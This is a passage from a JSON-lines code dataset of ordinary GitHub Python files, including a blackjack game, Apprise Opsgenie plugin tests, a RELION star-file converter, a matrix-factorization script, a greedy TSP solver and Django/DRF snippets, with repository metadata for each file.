Product([3, 6]).jsprinted, Product([6, 3]).jsprinted]\n elif self.product == 24:\n return [Product([3, 8]).jsprinted, Product([8, 3]).jsprinted,\n Product([4, 6]).jsprinted, Product([6, 4]).jsprinted]\n elif self.product == 36:\n return [Product([4, 9]).jsprinted, Product([9, 4]).jsprinted,\n Product([6, 6]).jsprinted]\n else:\n return [Product([self.nb1, self.nb2]).jsprinted,\n Product([self.nb2, self.nb1]).jsprinted]\n","repo_name":"nicolashainaux/mathmaker","sub_path":"mathmaker/lib/document/content/calculation/multi_reversed.py","file_name":"multi_reversed.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"41855222267","text":"T = int(input())\r\nfor test in range(T):\r\n house = []\r\n input1 = input()\r\n input1 = input1.split()\r\n N = int(input1[0])\r\n B = int(input1[1])\r\n input2 = input()\r\n input2 = input2.split()\r\n for x in input2:\r\n price = int(x)\r\n dictionary = {\"house\":x,\"price\":price}\r\n house.append(dictionary)\r\n \r\n def myFunc(e):\r\n return e['price']\r\n\r\n house.sort(key=myFunc)\r\n\r\n spent = 0\r\n purchased = 0\r\n\r\n for x in house:\r\n variable1 = x.get('price')\r\n spent += variable1\r\n if spent <= B:\r\n purchased += 1\r\n\r\n print(f\"Case #{test+1}: {purchased}\")","repo_name":"Hackerzone27/abcd","sub_path":"gpaper2.py","file_name":"gpaper2.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23661477028","text":"# Command line Blackjack - Created by Brenton O'Brien\n\n# Imports\nimport random\nimport os\nimport time\n\n# Global Variables\nchips = 100\nbet_amount = 0\nuser_hand = []\ndealer_hand = []\ndeck = []\nhas_hit = False\nhas_sat = False\ngot_bet = False\n\n\n# Create and shuffle a deck of cards\ndef create_deck():\n global deck\n suits = [\"Hearts\", \"Diamonds\", \"Spades\", \"Clubs\"]\n values = [\"Ace\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\", \"Jack\", \"Queen\", \"King\"]\n deck = [f\"{value} of {suit}\" for value in values for suit in suits] # Creates a list of 52 un-shuffled cards\n random.shuffle(deck) # Shuffles the deck\n\n\n# Create value system for cards\ndef calculate_card_value(card):\n value_dict = {\"Ace\": 11, \"2\": 2, \"3\": 3, \"4\": 4, \"5\": 5, \"6\": 6, \"7\": 7, \"8\": 8, \"9\": 9, \"10\": 10, \"Jack\": 10, \"Queen\": 10, \"King\": 10}\n for item in value_dict: # Loops through the 'keys' of the dictionary\n if item in card: # Checks to see if the 'key' is in the name of the card (i.e. if '2' is in '2 of Hearts')\n return value_dict[item] # Returns the 'Key's corresponding 'Value' integer\n\n\n# Count the value of a players hand, will also convert aces from 11 to 1 if the hand value is larger than 21\ndef count_hand_value(player_hand):\n current_value = 0 # Starts from zero each time the players hand needs to be counted\n for card in player_hand:\n current_value += calculate_card_value(card) # Adds up the value of each card in the players hand\n\n # The following code will track the amount of aces in a players hand so that it can be converted from 11 to 1 if the hand value is larger than 21\n ace_count = 0\n for card in player_hand: # Adds the amount of aces up\n if \"Ace\" in card:\n ace_count += 1\n\n while current_value > 21 and ace_count > 1: # If the value is larger than 21, convert the available aces from 11 to 1 until the value is under 21\n if ace_count >= 1: # Only run if aces are in the hand\n current_value -= 10 # Minus 10 from the value\n ace_count -= 1 # Remove the ace\n\n return current_value\n\n\n# Removes card from the deck and adds it the dealer or user hand\ndef deal_card(player): # The player parameter can be used to deal cards to either the user or the dealer\n global deck\n player.append(deck.pop())\n\n\n# Ask user for bet (Minimum $5), also controls user\ndef get_bet():\n global bet_amount, chips\n print(\"\\n******************** BLACKJACK ********************\")\n print(f\"\\nCurrent chips: ${chips}\")\n\n try:\n bet_amount = int(input('\\n\\n\\n\\n\\n\\n\\n\\n\\n***************************************************'\n '\\nPlease Enter an amount to bet (Minimum bet is $5)\\n\\n> $')) #This strange formatting is used to keep the look consistent\n\n if bet_amount > chips: # Stops bet being higher than the current amount of user chips\n print(f\"Bet is too high, you only have ${chips}\")\n time.sleep(2) # Keeps the message up for two seconds before clearing it and rerunning the function\n cls()\n get_bet()\n\n elif bet_amount < 5: # Ensures bet is higher than the minimum bet\n print(f\"Bet is too low, minimum bet is $5\")\n time.sleep(2)\n cls()\n get_bet()\n\n elif 5 <= bet_amount <= chips: # If valid bet, subtract it from the total bet and continue main_game_loop()\n chips = chips - bet_amount\n\n except ValueError:\n print(f\"Incorrect input, please enter a valid number\") # Only allows valid integers to be typed\n time.sleep(2)\n cls()\n get_bet()\n\n\n# Displays the main board, (cards, hand value, current chips and current bet) can also control when to show the dealers second card\ndef display_game_board():\n global bet_amount, has_sat\n\n print(\"\\n******************** BLACKJACK ********************\")\n print(f\"\\nCurrent Chips: ${chips}\")\n print(f\"\\nBet Amount: ${bet_amount}\")\n\n if has_sat: # If the user has sat, then allow the second dealer card to be showed\n print(f\"\\nDealer Hand: {', '.join(dealer_hand)}\")\n print(f\"Dealer Amount: {count_hand_value(dealer_hand)}\")\n\n else: # If the user hasn't sat yet, then only show the first card, and get the value of that first card only\n print(f\"\\nDealer Hand: {dealer_hand[0]}\")\n print(f\"Dealer Amount: {calculate_card_value(dealer_hand[0])}\")\n\n print(f\"\\nUser Hand: {', '.join(user_hand)}\")\n print(f\"User Amount: {count_hand_value(user_hand)}\\n\")\n print(\"***************************************************\")\n\n\n# Clears the terminal screen\ndef cls():\n os.system('cls')\n\n\ndef reset_variables(): # Used to reset all the required variables prior to each new hand being played\n global bet_amount, user_hand, dealer_hand, deck, has_sat, has_hit, got_bet\n\n bet_amount = 0\n user_hand = []\n dealer_hand = []\n deck = []\n has_hit = False\n has_sat = False\n got_bet = False\n\n\n# Check for blackjack when cards are first dealt, will also pay out chips if required, and gives reset prompt\ndef check_for_blackjack(userhand, dealerhand):\n global chips, bet_amount, has_sat, has_hit\n\n if count_hand_value(dealerhand) == 21 and count_hand_value(userhand) == 21: # Accounts for if both players hit blackjack\n has_sat = True # This variable is set to true so that the dealers second card is revealed in display_board() after cls()\n cls()\n display_game_board()\n chips += bet_amount # Gives the bet back to the user\n reset_prompt('Draw! Both Players Have Blackjack')\n\n elif count_hand_value(dealerhand) == 21: # Accounts for if only dealer hits blackjack\n has_sat = True\n cls()\n display_game_board()\n reset_prompt('Dealer has Blackjack! User loses')\n\n elif count_hand_value(userhand) == 21: # Accounts for if only the dealer hits blackjack\n has_sat = True\n cls()\n display_game_board()\n if has_hit: # This accounts for if the user has hit already (therefore it is not technically blackjack)\n chips += bet_amount * 2\n else:\n chips += (bet_amount * 3) # Pays out if it is blackjack\n reset_prompt('User has Blackjack! User wins')\n\n\n# Ask player to hit or sit, runs the respective function\ndef hit_or_sit_prompt():\n answer = ''\n while answer not in ['1', '2']:\n answer = input('Would you like to hit or sit?\\n\\n1) Hit\\n2) Sit\\n>')\n\n if answer == '1':\n hit()\n\n elif answer == '2':\n sit()\n\n else:\n cls()\n display_game_board()\n\n\ndef reset_prompt(message): # This message will ask if the user wants to play again and also have a custom message to describe the result of the last hand\n replay_input = input(f'{message}!\\n\\n1) Bet again\\n2) EXIT\\n>')\n\n while replay_input not in [\"1\", \"2\"]:\n cls()\n display_game_board()\n replay_input = input('Would you like to bet again?\\n1) Bet again\\n2) EXIT\\n>')\n\n if replay_input == \"1\":\n cls()\n reset_variables()\n main_game_loop()\n\n elif replay_input == \"2\":\n exit()\n\n\ndef hit(): # Runs when the player hits, will track if the player busts, if not, asks the play to hit or sit\n global user_hand, has_hit\n\n has_hit = True\n\n deal_card(user_hand)\n cls()\n display_game_board()\n\n if count_hand_value(user_hand) > 21:\n replay_input = input('User Busts!\\n\\n1) Bet again\\n2) EXIT\\n>')\n\n while replay_input not in [\"1\", \"2\"]:\n cls()\n display_game_board()\n replay_input = input('Would you like to bet again?\\n1) Bet again\\n2) EXIT\\n>')\n\n if replay_input == \"1\":\n cls()\n reset_variables()\n main_game_loop()\n\n elif replay_input == \"2\":\n exit()\n\n else:\n hit_or_sit_prompt()\n\n\ndef sit(): # Continues to add cards to the dealers hand until they hit at least 16\n global has_sat, chips\n has_sat = True\n\n while count_hand_value(dealer_hand) < 16:\n deal_card(dealer_hand)\n cls()\n display_game_board()\n time.sleep(1)\n\n cls() # These two lines are used to display the dealers second card after has_sat = True\n display_game_board()\n\n if count_hand_value(dealer_hand) > 21: # Dealer busts and user gets paid their winning chips\n chips += (bet_amount * 2)\n reset_prompt('Dealer Busts')\n\n elif count_hand_value(user_hand) == count_hand_value(dealer_hand): # Handles the draw\n chips += bet_amount\n reset_prompt('Draw')\n\n elif count_hand_value(user_hand) > count_hand_value(dealer_hand): # Handles if player is closer to 21\n chips += (bet_amount * 2)\n reset_prompt('User Wins')\n\n elif count_hand_value(user_hand) < count_hand_value(dealer_hand): # Handles if dealer is closer to 21\n reset_prompt('Dealer Wins')\n\n\n# Create Main loop - Gets a bet, then creates a deck and deals cards, shows the board, checks for blackjack, then asks the hit/sit prompt\ndef main_game_loop():\n global got_bet, has_sat, chips\n\n if chips > 0: # Checks to see if there is at least 1 chip to bet\n\n if not got_bet: # Gets the initial bet\n get_bet()\n got_bet = True\n\n # Clears the screen\n cls()\n\n # Creates and shuffles a deck\n create_deck()\n\n # Deal Cards to dealer and user\n deal_card(dealer_hand)\n deal_card(dealer_hand)\n deal_card(user_hand)\n deal_card(user_hand)\n\n # Displays All cards, the current bet, and remaining chips\n display_game_board()\n\n # Checks to see if the user or player has hit blackjack\n check_for_blackjack(user_hand, dealer_hand)\n\n # Asks the user to hit or sit\n hit_or_sit_prompt()\n\n else: # If out of chips ask if the player wants to play again or quit\n cls()\n\n print(\"\\n******************** BLACKJACK ********************\")\n replay_prompt = input('\\nYou are out of chips!\\n\\nWould you like to restart with $100 chips or quit the game\\n1) RESTART\\n2) QUIT\\n>')\n\n if replay_prompt == '1':\n cls()\n chips = 100\n main_game_loop()\n\n elif replay_prompt == '2':\n exit()\n\n\nmain_game_loop() # Runs the game when first booting the program\n","repo_name":"brenton-obrien/python-cmd-blackjack","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41900306488","text":"\"\"\"migrate again\n\nRevision ID: c198a100215b\nRevises: a261b0c1e51b\nCreate Date: 2018-02-15 08:41:40.065096\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'c198a100215b'\ndown_revision = 'a261b0c1e51b'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('blogposts', sa.Column('fake_date', sa.String(length=255), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('blogposts', 'fake_date')\n # ### end Alembic commands ###\n","repo_name":"MaryMbugua/personalblog","sub_path":"migrations/versions/c198a100215b_migrate_again.py","file_name":"c198a100215b_migrate_again.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4428442483","text":"#! python3\n# lucky.py - Opens several Google search results\n\nimport requests, sys, webbrowser, bs4\n\nprint('Googling...')\nres = requests.get('http://google.com/search?q=' + ''.join(sys.argv[1:])) #Downloads the search page\nres.raise_for_status() #Checks for validity\n\n#Retrieve top search result links\nsoup = bs4.BeautifulSoup(res.text,\"html.parser\")\n\n#Opens browser tab for each result\nlinkElems = soup.select('.r a') #Finding all class elements that have r CSS class\nnumOpen = min(5, len(linkElems)) #Opens first 5 results or how many is in there\nfor i in range(numOpen):\n\twebbrowser.open('http://google.com'+linkElems[i].get('href'))\n\t","repo_name":"ndpark/PythonScripts","sub_path":"lucky.py","file_name":"lucky.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42259808847","text":"from algo.search.common import get_random_list\n\n\ndef sort(lst):\n n = len(lst)\n for i in range(1, n):\n val = lst[i]\n j = i - 1\n while j >= 0 and val < lst[j]:\n lst[j+1] = lst[j]\n j -= 1\n lst[j + 1] = val\n\n\nif __name__ == '__main__':\n l = get_random_list(0, 100, 5)\n print(l)\n sort(l)\n print(l)\n","repo_name":"urm8/ads","sub_path":"algo/sort/insertion.py","file_name":"insertion.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12479999761","text":"from PyInquirer import style_from_dict, prompt, Token\nfrom client.api.commande_Client import CommandeAppliClient\n\nclass Add_menu:\n def __init__(self) -> None:\n self.style = style_from_dict({\n Token.Separator : '#fff', #white\n Token.QuestionMark : '#000', #black\n Token.Selected : '#00BFFF', #sky blue\n Token.Pointer : '#fff', #white\n Token.Instruction : '#fff', #white\n Token.Answer : '#008000 bold', #green\n Token.Question : '#FF7F50', #shade of orange\n })\n \n def add_menu(self,list_id_resto, list_resto, info_client, list_menu,idr,commande):\n liste = [\"Retour\"]\n liste_prix=[\"\"]\n for i in range(len(list_menu)):\n liste.append(list_menu[i][\"nom\"])\n liste_prix.append(list_menu[i][\"prix\"])\n liste_affichage = []\n for i in range(len(liste)):\n if(i==0):\n liste_affichage.append(liste[i] + \" \" + str(liste_prix[i]))\n else : \n liste_affichage.append(liste[i] + \" \" + str(liste_prix[i])+ \" €\")\n elements = [\n {\n 'type' : 'list',\n 'name' : 'capital',\n 'message' : 'Que voulez vous faire ?:',\n 'choices' : liste_affichage\n }\n ]\n list_choix = prompt(elements, style=self.style)\n choix = list_choix[\"capital\"]\n\n if(choix==liste_affichage[0]):\n from client.views.view_order import Display_content_order\n return Display_content_order().create_order(list_id_resto, list_resto, info_client, list_menu,idr,commande)\n \n menu_choisis = list_menu[liste_affichage.index(choix)-1]\n \n c = CommandeAppliClient.add_menu(menu_choisis['nom'],commande[\"username\"],commande[\"id_restaurant\"],commande[\"date\"],commande[\"contenu\"])\n print(\"Le menu \" + menu_choisis['nom'] + \" a bien été ajouté à votre commande.\")\n from client.views.view_order import Display_content_order\n return Display_content_order().create_order(list_id_resto,list_resto,info_client,list_menu,idr,c)\n \n ","repo_name":"lk34000/EnsaEats","sub_path":"client/views/add_menu.py","file_name":"add_menu.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74422949492","text":"#!/usr/bin/env python\n# Usage: dstar2hdf.py star_file stackout\n# created by Jingqi \n# 6/11/2017\n\nimport sys\nfrom subprocess import Popen,PIPE\nfrom EMAN2 import *\nfrom sparx import *\n\n# global variant\napix = float(1.63)\nbfactor = float(0)\nampas = float(0)\nangas = float(0)\n\ndef get_image(wheresptcl): \n \"\"\" Get the particle from the relion mrcs (take a single string as input). \"\"\"\n ptcl_path = wheresptcl.split('@')[1][:-4]+\"hdf\"\n ptcl_index = int(wheresptcl.split('@')[0])-1\n image = EMData().read_image(ptcl_path,ptcl_index)\n return image\n\ndef ctf_gen(dfxu,dfxv,cs,voltage,amp_contrast): \n \"\"\"Retrieve the ctf values from a star file.\"\"\"\n\n # defocus = (defocusU + defocusV)/2, unit in A.\n defocus = (dfxu+dfxv)/2\n # Although EMAN or sparx take the defocus value in um, generate_ctf function can convert A into um. So no math need for the defocus value. \n ctf_list = [defocus, cs, voltage, apix, bfactor, amp_contrast, ampas, angas]\n img_ctf = generate_ctf(ctf_list)\n return img_ctf\n\n\nstar_file = sys.argv[1]\nstackout = sys.argv[2]\n\n# Get line index\n## _rlnImageName (particle image)\nptcl_line = Popen(['grep','_rlnImageName',star_file], stdout=PIPE).stdout.read().split()[1][1:]\n## _rlnDefocusU\ndfxu_line = Popen(['grep','_rlnDefocusU',star_file], stdout=PIPE).stdout.read().split()[1][1:]\n## _rlnDefocusV\ndfxv_line = Popen(['grep','_rlnDefocusV',star_file], stdout=PIPE).stdout.read().split()[1][1:]\n## _rlnSphericalAberration\ncs_line = Popen(['grep','_rlnSphericalAberration',star_file], stdout=PIPE).stdout.read().split()[1][1:]\n## _rlnVoltage\nkev_line = Popen(['grep','_rlnVoltage',star_file], stdout=PIPE).stdout.read().split()[1][1:]\n## _rlnAmplitudeContrast\nampc_line = Popen(['grep','_rlnAmplitudeContrast',star_file], stdout=PIPE).stdout.read().split()[1][1:]\n## _rlnCoordinateX\ncrdx_line = Popen(['grep','_rlnCoordinateX',star_file], stdout=PIPE).stdout.read().split()[1][1:]\n## _rlnCoordinateY\ncrdy_line = Popen(['grep','_rlnCoordinateY',star_file], stdout=PIPE).stdout.read().split()[1][1:]\n## _rlnMicrographName\nmic_line = Popen(['grep','_rlnMicrographName',star_file], stdout=PIPE).stdout.read().split()[1][1:]\n\ni = 0\nfor row in open(star_file).read().split('\\n'):\n if len(row.split()) > 4: \n star_row = row.split()\n# Particle image \n wheresptcl = star_row[int(ptcl_line)-1]\n image = get_image(wheresptcl)\n# CTF object\n dfxu = float(star_row[int(dfxu_line)-1])\n dfxv = float(star_row[int(dfxv_line)-1])\n cs = float(star_row[int(cs_line)-1])\n voltage = float(star_row[int(kev_line)-1])\n amp_contrast = float(star_row[int(ampc_line)-1])\n image_ctf = ctf_gen(dfxu,dfxv,cs,voltage,amp_contrast)\n image.set_attr(\"ctf\", image_ctf)\n# Set other attributes\n crdx = float(star_row[int(crdx_line)-1])\n crdy = float(star_row[int(crdy_line)-1])\n image.set_attr(\"ptcl_source_coord\",[crdx,crdy])\n mic_source = star_row[int(mic_line)-1]\n image.set_attr(\"ptcl_source_image\",mic_source)\n# write stack \n image.write_image(stackout, i)\n i += 1\n\n#---END---\n","repo_name":"duanjingqi/CryoEM-sparx-python-utilities","sub_path":"dstar2hdf.py","file_name":"dstar2hdf.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14219068702","text":"from django.contrib import admin\nfrom django.urls import path\nfrom .views import *\n\napp_name = \"review\"\n\nurlpatterns = [\n path('detail/', detail, name='detail'),\n path('new/', new, name='new'),\n path('allreviews', allReviews, name=\"allreviews\"),\n path('', index, name='index'),\n path('search/', showSearch, name=\"search\"),\n path('delete//', delete, name=\"delete\"),\n]","repo_name":"hildakim/muse","sub_path":"review/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15224762957","text":"from unittest import mock\n\nimport requests\nimport apprise\nfrom apprise.plugins.NotifyOpsgenie import NotifyOpsgenie, OpsgeniePriority\nfrom helpers import AppriseURLTester\n\n# Disable logging for a cleaner testing output\nimport logging\nlogging.disable(logging.CRITICAL)\n\n# a test UUID we can use\nUUID4 = '8b799edf-6f98-4d3a-9be7-2862fb4e5752'\n\n# Our Testing URLs\napprise_url_tests = (\n ('opsgenie://', {\n # We failed to identify any valid authentication\n 'instance': TypeError,\n }),\n ('opsgenie://:@/', {\n # We failed to identify any valid authentication\n 'instance': TypeError,\n }),\n ('opsgenie://%20%20/', {\n # invalid apikey specified\n 'instance': TypeError,\n }),\n ('opsgenie://apikey/user/?region=xx', {\n # invalid region id\n 'instance': TypeError,\n }),\n ('opsgenie://apikey/', {\n # No targets specified; this is allowed\n 'instance': NotifyOpsgenie,\n }),\n ('opsgenie://apikey/user', {\n # Valid user\n 'instance': NotifyOpsgenie,\n 'privacy_url': 'opsgenie://a...y/%40user',\n }),\n ('opsgenie://apikey/@user?region=eu', {\n # European Region\n 'instance': NotifyOpsgenie,\n }),\n ('opsgenie://apikey/@user?entity=A%20Entity', {\n # Assign an entity\n 'instance': NotifyOpsgenie,\n }),\n ('opsgenie://apikey/@user?alias=An%20Alias', {\n # Assign an alias\n 'instance': NotifyOpsgenie,\n }),\n ('opsgenie://apikey/@user?priority=p3', {\n # Assign our priority\n 'instance': NotifyOpsgenie,\n }),\n ('opsgenie://apikey/?tags=comma,separated', {\n # Test our our 'tags' (tag is reserved in Apprise) but not 'tags'\n # Also test the fact we do not need to define a target\n 'instance': NotifyOpsgenie,\n }),\n ('opsgenie://apikey/@user?priority=invalid', {\n # Invalid priority (loads using default)\n 'instance': NotifyOpsgenie,\n }),\n ('opsgenie://apikey/user@email.com/#team/*sche/^esc/%20/a', {\n # Valid user (email), valid schedule, Escalated ID,\n # an invalid entry (%20), and too short of an entry (a)\n 'instance': NotifyOpsgenie,\n }),\n ('opsgenie://apikey/@{}/#{}/*{}/^{}/'.format(\n UUID4, UUID4, UUID4, UUID4), {\n # similar to the above, except we use the UUID's\n 'instance': NotifyOpsgenie,\n }),\n # Same link as before but @ missing at the front causing an ambigious\n # lookup however the entry is treated a though a @ was in front (user)\n ('opsgenie://apikey/{}/#{}/*{}/^{}/'.format(\n UUID4, UUID4, UUID4, UUID4), {\n # similar to the above, except we use the UUID's\n 'instance': NotifyOpsgenie,\n }),\n ('opsgenie://apikey?to=#team,user&+key=value&+type=override', {\n # Test to= and details (key/value pair) also override 'type'\n 'instance': NotifyOpsgenie,\n }),\n ('opsgenie://apikey/#team/@user/?batch=yes', {\n # Test batch=\n 'instance': NotifyOpsgenie,\n }),\n ('opsgenie://apikey/#team/@user/?batch=no', {\n # Test batch=\n 'instance': NotifyOpsgenie,\n }),\n ('opsgenie://?apikey=abc&to=user', {\n # Test Kwargs\n 'instance': NotifyOpsgenie,\n }),\n ('opsgenie://apikey/#team/user/', {\n 'instance': NotifyOpsgenie,\n # throw a bizzare code forcing us to fail to look it up\n 'response': False,\n 'requests_response_code': 999,\n }),\n ('opsgenie://apikey/#topic1/device/', {\n 'instance': NotifyOpsgenie,\n # Throws a series of connection and transfer exceptions when this flag\n # is set and tests that we gracfully handle them\n 'test_requests_exceptions': True,\n }),\n)\n\n\ndef test_plugin_opsgenie_urls():\n \"\"\"\n NotifyOpsgenie() Apprise URLs\n\n \"\"\"\n\n # Run our general tests\n AppriseURLTester(tests=apprise_url_tests).run_all()\n\n\n@mock.patch('requests.post')\ndef test_plugin_opsgenie_config_files(mock_post):\n \"\"\"\n NotifyOpsgenie() Config File Cases\n \"\"\"\n content = \"\"\"\n urls:\n - opsgenie://apikey/user:\n - priority: 1\n tag: opsgenie_int low\n - priority: \"1\"\n tag: opsgenie_str_int low\n - priority: \"p1\"\n tag: opsgenie_pstr_int low\n - priority: low\n tag: opsgenie_str low\n\n # This will take on moderate (default) priority\n - priority: invalid\n tag: opsgenie_invalid\n\n - opsgenie://apikey2/user2:\n - priority: 5\n tag: opsgenie_int emerg\n - priority: \"5\"\n tag: opsgenie_str_int emerg\n - priority: \"p5\"\n tag: opsgenie_pstr_int emerg\n - priority: emergency\n tag: opsgenie_str emerg\n \"\"\"\n\n # Prepare Mock\n mock_post.return_value = requests.Request()\n mock_post.return_value.status_code = requests.codes.ok\n\n # Create ourselves a config object\n ac = apprise.AppriseConfig()\n assert ac.add_config(content=content) is True\n\n aobj = apprise.Apprise()\n\n # Add our configuration\n aobj.add(ac)\n\n # We should be able to read our 9 servers from that\n # 4x low\n # 4x emerg\n # 1x invalid (so takes on normal priority)\n assert len(ac.servers()) == 9\n assert len(aobj) == 9\n assert len([x for x in aobj.find(tag='low')]) == 4\n for s in aobj.find(tag='low'):\n assert s.priority == OpsgeniePriority.LOW\n\n assert len([x for x in aobj.find(tag='emerg')]) == 4\n for s in aobj.find(tag='emerg'):\n assert s.priority == OpsgeniePriority.EMERGENCY\n\n assert len([x for x in aobj.find(tag='opsgenie_str')]) == 2\n assert len([x for x in aobj.find(tag='opsgenie_str_int')]) == 2\n assert len([x for x in aobj.find(tag='opsgenie_pstr_int')]) == 2\n assert len([x for x in aobj.find(tag='opsgenie_int')]) == 2\n\n assert len([x for x in aobj.find(tag='opsgenie_invalid')]) == 1\n assert next(aobj.find(tag='opsgenie_invalid')).priority == \\\n OpsgeniePriority.NORMAL\n","repo_name":"caronc/apprise","sub_path":"test/test_plugin_opsgenie.py","file_name":"test_plugin_opsgenie.py","file_ext":"py","file_size_in_byte":6008,"program_lang":"python","lang":"en","doc_type":"code","stars":8936,"dataset":"github-code","pt":"21"} +{"seq_id":"27037031603","text":"# 행렬 분해 : R = P * Q.T\n# NaN이 포함된 R이 주어졌을 때 P, Q를 추정한다.\n# by Stochastic Gradient Descent\n# -------------------------------------------\nimport numpy as np\n# alpha: learning rate\n# beta: for regularization - 너무 과하게 주면 과소적합\n# err_limit: early stopping - 이 이상 안움직이면 멈춰라\nstop = []\nerror = []\ndef factorize_matrix(R, K, max_iter=5000, alpha=0.01, beta=0.01, err_limit=0.0001, verbose=False):\n n_user = R.shape[0]\n n_item = R.shape[1]\n \n P = np.random.rand(n_user, K) # user-factor matrix\n Q = np.random.rand(K, n_item) # factor-item matrix\n old_err = 99999999 # 학습 전 err\n \n for step in range(max_iter):\n for i in range(n_user):\n for j in range(n_item):\n if np.isnan(R[i, j]) != True: # nan이 아니면\n eij = R[i, j] - np.dot(P[i, :], Q[:, j]) # 두 벡터의 내적임, 행렬 연산이 아니다.\n \n # update P, Q - 행 단위로 update\n P[i, :] += alpha * (eij * Q[:, j] - beta * P[i, :])\n Q[:, j] += alpha * (eij * P[i, :] - beta * Q[:, j])\n\n # P,Q update 후 total err\n tot_err = 0\n for i in range(n_user):\n for j in range(n_item):\n if np.isnan(R[i, j]) != True:\n tot_err += (R[i, j] - np.dot(P[i, :], Q[:, j])) ** 2\n \n if verbose:\n print('step : {}, error = {:.4f}'.format(step, tot_err))\n stop.append(step)\n error.append(tot_err)\n # early stopping\n if np.abs(old_err - tot_err) < err_limit:\n break\n old_err = tot_err\n\n if step >= max_iter - 1:\n print('max_iter={}번 동안 stop하지 못했습니다.'.format(max_iter))\n print('max_iter를 늘리거나 err_limit을 늘려야 합니다.')\n \n return P, Q\n\n# User-item matrix\nN = np.NaN\nR = np.array([[4, N, N, 2, N],\n [N, 5, N, 3, 1],\n [N, N, 3, 4, 4],\n [5, 2, 1, 2, N]])\n\nk = 3 # number of factors - 사용자가 결정\nP, Q = factorize_matrix(R, k, verbose=True)\nER = np.dot(P, Q) # estimated R\n\nprint('\\nR :')\nprint(np.round(R, 2))\nprint('\\nEstimated R :')\nprint(np.round(ER, 2)) \nprint('\\nP :')\nprint(np.round(P, 2))\nprint('\\nQ.T :')\nprint(np.round(Q.T, 2))\n\n# 그래프로 표현하기\nimport matplotlib.pyplot as plt\n\nplt.plot(stop, error, label='Loss')\nplt.xlabel('step')\nplt.ylabel('error')\nplt.legend()\nplt.show()","repo_name":"dobbytk/NLP_study","sub_path":"Multicampus/ML/day8/matrix_factorize_GD.py","file_name":"matrix_factorize_GD.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74344901491","text":"from rest_framework import serializers\nfrom .models import Venue, Event\n\n\nclass EventSerializer(serializers.HyperlinkedModelSerializer):\n venue = serializers.HyperlinkedRelatedField(\n view_name='venue-detail',\n read_only=True\n )\n\n class Meta:\n model = Event\n fields = ('id', 'venue', 'eventname',\n 'datetime', 'price', 'details', 'img')\n\n\nclass VenueSerializer(serializers.HyperlinkedModelSerializer):\n event = EventSerializer(\n many=True,\n read_only=True\n )\n\n class Meta:\n model = Venue\n fields = ('id', 'venuename', 'address', 'city',\n 'state', 'vaccinationrequired', 'event', 'img')\n","repo_name":"BChan26/Tick-iT","sub_path":"Backend/ticket_app/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34650721694","text":"import sys\nsys.path.insert(0, '../../TSProject/')\n\nimport numpy as np\nimport random as rd\nfrom time import time \n\n# Implementation of the greedy algorithm for TSP\n# Input:\n# adj_mat: adjacency matrix\n# Output:\n# cost: cost found\n# list_of_traversed_nodes: associated path\n# time: time needed to execute the algorithm\n\ndef greedy(graph):\n adj_mat = graph.weighted_adjacency_matrix\n t1 = time()\n nNodes = len(adj_mat)\n firstMove = np.unravel_index(np.argmin(adj_mat),adj_mat.shape)\n listOfTraversedNodes = [firstMove[0],firstMove[1]]\n cost = adj_mat[firstMove[0],firstMove[1]]\n while len(listOfTraversedNodes) < len(adj_mat):\n currentCosts = list(adj_mat[listOfTraversedNodes[-1],:])\n for idx2 in listOfTraversedNodes:\n currentCosts[idx2] = np.inf\n listOfTraversedNodes.append(np.argmin(currentCosts))\n cost += adj_mat[listOfTraversedNodes[-2],listOfTraversedNodes[-1]]\n cost += adj_mat[listOfTraversedNodes[-1],listOfTraversedNodes[0]]\n t2 = time()\n return cost, listOfTraversedNodes + [listOfTraversedNodes[0]], (t2-t1)","repo_name":"FabianWalocha/TSProject","sub_path":"algorithms/greedy.py","file_name":"greedy.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26028273702","text":"#!/usr/bin/python3\n# -*-coding:utf-8 -*-\n# @Time    : 2019/12/4 18:10\n# @Author  : Peter Zheng\n# @File    : dataloader_builder.py\n# @Software: PyCharm\nfrom .csv_dataloader import Csv_Dataloader\n\n_DATA_LOADERS = {\"Csv_Dataloader\":Csv_Dataloader}\ndef make_dataloader(cfg,is_trian = True):\n data_loader = _DATA_LOADERS[cfg.DATA_LOADER.TYPE]\n return 